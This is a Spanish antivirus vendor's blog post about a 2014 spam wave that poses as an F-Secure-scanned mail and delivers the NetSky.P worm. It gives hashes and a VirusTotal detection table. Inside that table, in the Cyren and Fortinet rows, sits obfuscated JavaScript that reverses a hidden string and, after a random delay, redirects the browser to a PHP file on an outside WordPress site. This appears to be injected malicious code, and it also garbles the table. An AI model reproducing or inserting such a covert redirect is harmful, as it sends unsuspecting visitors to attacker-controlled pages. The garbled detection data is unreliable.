OTRO MAIL MASIVO, ESTA VEZ INDICANDO QUE HA SIDO REVISADO POR F-SECURE, resulta ser un antiguo NETSKY P, ya controlado

A través de un mail malicioso masivo (spam) se recibe este tipo de mail con el fichero anexado:

message_sat.exe,

con las siguientes caractericticas:
MAIL MALICIOSO:
_______________

Re: Delivery Server
“important stylesheet” href=”chrome://messagebody/skin/messageBody.css”>

Asunto: Delivery Server
Fecha:  20/10/2014
Para: <Destinatario>
First part of the secure mail is available.

++++ Attachment: No Virus found
++++ F-Secure AntiVirus – <a class=”moz-txt-link-abbreviated” href=”http://www.f-secure.com”>www.f-secure.com

______________________
FIN DEL MAIL MALICIOSO

 

A traves de nuestra utilidad ELINETSA ya controlamos dicho malware desde antaño !

El preanalisis de virustotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: photo.doc …
Detecciones: 51 / 54
Fecha de análisis: 2014-10-16 12:43:08 UTC

1 25

Antivirus Resultado Actualización
AVG I-Worm/Netsky 20141016
AVware Email-Worm.Win32.NetSky.q 20141016
Ad-Aware Win32.Generic.497472 20141016
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20141015
AhnLab-V3 Win-Trojan/Fsg.29568 20141016
Antiy-AVL Worm[Email]/Win32.NetSky 20141016
Avast Win32:Netsky-AF [Wrm] 20141016
Avira Worm/Netsky.AP 20141016
Baidu-International Worm.Win32.NetSky.Asn 20141015
BitDefender Win32.Generic.497472 20141016
Bkav W32.SkyNetP.Worm 20141015
CAT-QuickHeal W32.NetSky.P 20141016
CMC Generic.Win32.3018e99857!MD 20141016
ClamAV Worm.NetSky-14 20141016
Comodo Worm.Win32.Netsky.Q 20141016
Cyren $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20141016
F-Secure Win32.Generic.497472 20141016
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20141016
McAfee-GW-Edition BehavesLike.Win32.Fujacks.mc 20141015
MicroWorld-eScan Win32.Generic.497472 20141016
Microsoft Worm:Win32/Netsky.P@mm 20141016
NANO-Antivirus Trojan.Win32.NetSky.idzx 20141016
Norman Netsky.P 20141016
Qihoo-360 Win32/Worm.d2e 20141016
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20141016
SUPERAntiSpyware Worm.Netsky-P 20141016
Sophos W32/Netsky-P 20141016
Symantec tos tres no lo controlan todavía:

AegisLab  20141016
ByteHero  20141016
Jiangmin  20141015

Dicha utilidad ELINETSA que lo detecta y elimina es la misma que ya está actualmente en nuestra web

saludos

ms, 20-10-2014

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con
info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies